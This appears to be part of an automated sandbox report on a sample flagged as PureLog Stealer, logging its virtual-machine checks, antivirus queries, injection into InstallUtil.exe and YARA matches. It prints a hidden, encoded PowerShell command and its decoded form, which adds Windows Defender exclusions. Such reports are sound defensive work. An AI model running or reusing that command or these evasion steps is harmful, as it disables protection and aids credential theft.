                    Source: C:\Users\user\AppData\Local\Temp\txxbiwtbs.exeThread delayed: delay time: 97484
                    Source: C:\Users\user\AppData\Local\Temp\txxbiwtbs.exeThread delayed: delay time: 922337203685477
                    Source: txxbiwtbs.exe, 0000000B.00000002.1995844689.00000000029BF000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: SerialNumber0VMware|VIRTUAL|A M I|XenDselect * from Win32_ComputerSystem
                    Source: txxbiwtbs.exe, 0000000B.00000002.1995844689.00000000029BF000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: model0Microsoft|VMWare|Virtual
                    Source: InstallUtil.exe, 00000004.00000002.2968906608.00000000013D7000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll"
                    Source: file.exe, 00000000.00000002.1761959990.0000000001275000.00000004.00000020.00020000.00000000.sdmp, TypeId.exe, 00000003.00000002.1838711068.00000000016DB000.00000004.00000020.00020000.00000000.sdmp, txxbiwtbs.exe, 0000000B.00000002.1975910314.0000000000CA2000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information queried: ProcessInformation
                    Source: C:\Users\user\Desktop\file.exeProcess token adjusted: Debug
                    Source: C:\Users\user\Desktop\file.exeProcess token adjusted: Debug
                    Source: C:\Users\user\Desktop\file.exeProcess token adjusted: Debug
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
                    Source: C:\Users\user\AppData\Local\RegisteredChannels\hwrtalnmj\TypeId.exeProcess token adjusted: Debug
                    Source: C:\Users\user\AppData\Local\RegisteredChannels\hwrtalnmj\TypeId.exeProcess token adjusted: Debug
                    Source: C:\Users\user\AppData\Local\RegisteredChannels\hwrtalnmj\TypeId.exeProcess token adjusted: Debug
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess token adjusted: Debug
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess token adjusted: Debug
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess token adjusted: Debug
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
                    Source: C:\Users\user\AppData\Local\Temp\txxbiwtbs.exeProcess token adjusted: Debug
                    Source: C:\Users\user\AppData\Local\Temp\txxbiwtbs.exeProcess token adjusted: Debug
                    Source: C:\Users\user\Desktop\file.exeMemory allocated: page read and write | page guard

                    HIPS / PFW / Operating System Protection Evasion

                    barindex
                    Bypasses PowerShell execution policy
                    Source: unknownProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -ExecutionPolicy Bypass -WindowStyle Hidden -NoProfile -enc QQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEMAOgBcAFUAcwBlAHIAcwBcAGoAbwBuAGUAcwBcAEEAcABwAEQAYQB0AGEAXABMAG8AYwBhAGwALABDADoAXABVAHMAZQByAHMAXABqAG8AbgBlAHMAXABBAHAAcABEAGEAdABhAFwATABvAGMAYQBsAFwAVABlAG0AcABcADsAIABBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAALQBFAHgAYwBsAHUAcwBpAG8AbgBQAHIAbwBjAGUAcwBzACAAVAB5AHAAZQBJAGQALgBlAHgAZQA7AA==
                    Encrypted powershell cmdline option found
                    Source: unknownProcess created: Base64 decoded Add-MpPreference -ExclusionPath C:\Users\jones\AppData\Local,C:\Users\jones\AppData\Local\Temp\; Add-MpPreference -ExclusionProcess TypeId.exe;
                    Source: unknownProcess created: Base64 decoded Add-MpPreference -ExclusionPath C:\Users\jones\AppData\Local,C:\Users\jones\AppData\Local\Temp\; Add-MpPreference -ExclusionProcess TypeId.exe;
                    Injects a PE file into a foreign processes
                    Source: C:\Users\user\AppData\Local\RegisteredChannels\hwrtalnmj\TypeId.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe base: 400000 value starts with: 4D5A
                    Writes to foreign memory regions
                    Source: C:\Users\user\AppData\Local\RegisteredChannels\hwrtalnmj\TypeId.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe base: 400000
                    Source: C:\Users\user\AppData\Local\RegisteredChannels\hwrtalnmj\TypeId.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe base: 402000
                    Source: C:\Users\user\AppData\Local\RegisteredChannels\hwrtalnmj\TypeId.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe base: 404000
                    Source: C:\Users\user\AppData\Local\RegisteredChannels\hwrtalnmj\TypeId.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe base: 406000
                    Source: C:\Users\user\AppData\Local\RegisteredChannels\hwrtalnmj\TypeId.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe base: EC3008
                    Source: C:\Users\user\AppData\Local\RegisteredChannels\hwrtalnmj\TypeId.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
                    Source: unknownProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -executionpolicy bypass -windowstyle hidden -noprofile -enc qqbkagqalqbnahaauabyaguazgblahiazqbuagmazqagac0arqb4agmabab1ahmaaqbvag4auabhahqaaaagaemaogbcafuacwblahiacwbcagoabwbuaguacwbcaeeacabwaeqayqb0ageaxabmag8aywbhagwalabdadoaxabvahmazqbyahmaxabqag8abgblahmaxabbahaacabeageadabhafwatabvagmayqbsafwavablag0acabcadsaiabbagqazaatae0acabqahiazqbmaguacgblag4aywblacaalqbfahgaywbsahuacwbpag8abgbqahiabwbjaguacwbzacaavab5ahaazqbjagqalgblahgazqa7aa==
                    Source: unknownProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -executionpolicy bypass -windowstyle hidden -noprofile -enc qqbkagqalqbnahaauabyaguazgblahiazqbuagmazqagac0arqb4agmabab1ahmaaqbvag4auabhahqaaaagaemaogbcafuacwblahiacwbcagoabwbuaguacwbcaeeacabwaeqayqb0ageaxabmag8aywbhagwalabdadoaxabvahmazqbyahmaxabqag8abgblahmaxabbahaacabeageadabhafwatabvagmayqbsafwavablag0acabcadsaiabbagqazaatae0acabqahiazqbmaguacgblag4aywblacaalqbfahgaywbsahuacwbpag8abgbqahiabwbjaguacwbzacaavab5ahaazqbjagqalgblahgazqa7aa==
                    Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Users\user\Desktop\file.exe VolumeInformation
                    Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
                    Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
                    Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System\v4.0_4.0.0.0__b77a5c561934e089\System.dll VolumeInformation
                    Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Core\v4.0_4.0.0.0__b77a5c561934e089\System.Core.dll VolumeInformation
                    Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Xml\v4.0_4.0.0.0__b77a5c561934e089\System.XML.dll VolumeInformation
                    Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Management.dll VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
                    Source: C:\Users\user\AppData\Local\RegisteredChannels\hwrtalnmj\TypeId.exeQueries volume information: C:\Users\user\AppData\Local\RegisteredChannels\hwrtalnmj\TypeId.exe VolumeInformation
                    Source: C:\Users\user\AppData\Local\RegisteredChannels\hwrtalnmj\TypeId.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
                    Source: C:\Users\user\AppData\Local\RegisteredChannels\hwrtalnmj\TypeId.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
                    Source: C:\Users\user\AppData\Local\RegisteredChannels\hwrtalnmj\TypeId.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System\v4.0_4.0.0.0__b77a5c561934e089\System.dll VolumeInformation
                    Source: C:\Users\user\AppData\Local\RegisteredChannels\hwrtalnmj\TypeId.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Core\v4.0_4.0.0.0__b77a5c561934e089\System.Core.dll VolumeInformation
                    Source: C:\Users\user\AppData\Local\RegisteredChannels\hwrtalnmj\TypeId.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Xml\v4.0_4.0.0.0__b77a5c561934e089\System.XML.dll VolumeInformation
                    Source: C:\Users\user\AppData\Local\RegisteredChannels\hwrtalnmj\TypeId.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Management.dll VolumeInformation
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeQueries volume information: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe VolumeInformation
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System\v4.0_4.0.0.0__b77a5c561934e089\System.dll VolumeInformation
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Core\v4.0_4.0.0.0__b77a5c561934e089\System.Core.dll VolumeInformation
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Xml\v4.0_4.0.0.0__b77a5c561934e089\System.XML.dll VolumeInformation
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Management.dll VolumeInformation
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Configuration\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Configuration.dll VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
                    Source: C:\Users\user\AppData\Local\Temp\txxbiwtbs.exeQueries volume information: C:\Users\user\AppData\Local\Temp\txxbiwtbs.exe VolumeInformation
                    Source: C:\Users\user\AppData\Local\Temp\txxbiwtbs.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
                    Source: C:\Users\user\AppData\Local\Temp\txxbiwtbs.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
                    Source: C:\Users\user\Desktop\file.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid
                    Source: C:\Users\user\Desktop\file.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct
                    Source: C:\Users\user\AppData\Local\RegisteredChannels\hwrtalnmj\TypeId.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct

                    Stealing of Sensitive Information

                    barindex
                    Yara detected PureLog Stealer
                    Source: Yara matchFile source: 0.2.file.exe.459c2e8.6.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 3.2.TypeId.exe.4a46068.12.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 3.2.TypeId.exe.4a96088.4.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.file.exe.440c2a8.9.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.file.exe.b070000.26.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 3.2.TypeId.exe.427ffc0.3.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 4.2.InstallUtil.exe.4ae3330.6.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 3.2.TypeId.exe.4a96088.4.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 11.2.txxbiwtbs.exe.3c19948.2.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 11.2.txxbiwtbs.exe.3c19948.2.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 4.2.InstallUtil.exe.4ae3330.6.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.file.exe.440c2a8.9.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 11.2.txxbiwtbs.exe.7520000.5.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.file.exe.445c2c8.4.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 4.2.InstallUtil.exe.91a2688.15.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.file.exe.526a0e8.8.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.file.exe.4e9edb0.1.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 4.2.InstallUtil.exe.91a2688.15.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.file.exe.8f40000.23.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.file.exe.459c2e8.6.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.file.exe.b070000.26.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 4.2.InstallUtil.exe.4259570.5.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 4.2.InstallUtil.exe.4259570.5.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 11.2.txxbiwtbs.exe.7520000.5.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.file.exe.4e7ed90.5.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.file.exe.8f40000.23.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.file.exe.6b60000.12.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 4.2.InstallUtil.exe.4059550.7.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.file.exe.4e9edb0.1.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.file.exe.526a0e8.8.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 3.2.TypeId.exe.427ffc0.3.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.file.exe.6b60000.12.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 4.2.InstallUtil.exe.4659590.2.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 3.2.TypeId.exe.4c760c8.6.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.file.exe.445c2c8.4.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 3.2.TypeId.exe.4a46068.12.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 3.2.TypeId.exe.4c760c8.6.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.file.exe.4e7ed90.5.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 3.2.TypeId.exe.494cee0.8.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 4.2.InstallUtil.exe.4659590.2.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.file.exe.478c788.3.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 4.2.InstallUtil.exe.4059550.7.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 00000004.00000002.3019858995.0000000004AB7000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 0000000B.00000002.2048354854.0000000003AB1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 0000000B.00000002.2167920075.0000000007520000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000000.00000002.1808267831.0000000008F40000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000000.00000002.1783529566.0000000006B60000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000003.00000002.1869188121.00000000047F2000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000004.00000002.3204622217.0000000009049000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000003.00000002.1869188121.0000000004131000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000004.00000002.3019858995.0000000004659000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000000.00000002.1767868411.000000000478C000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000000.00000002.1767868411.000000000459C000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000003.00000002.1869188121.0000000004C76000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000000.00000002.1830742150.000000000B070000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000000.00000002.1767868411.0000000004378000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000004.00000002.3019858995.0000000004058000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000000.00000002.1767868411.0000000005266000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000003.00000002.1841950156.00000000032A9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000000.00000002.1790879005.0000000007CB1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: Process Memory Space: file.exe PID: 7600, type: MEMORYSTR
                    Source: Yara matchFile source: Process Memory Space: TypeId.exe PID: 7764, type: MEMORYSTR
                    Source: Yara matchFile source: Process Memory Space: InstallUtil.exe PID: 8028, type: MEMORYSTR

                    Remote Access Functionality

                    barindex
                    Yara detected PureLog Stealer
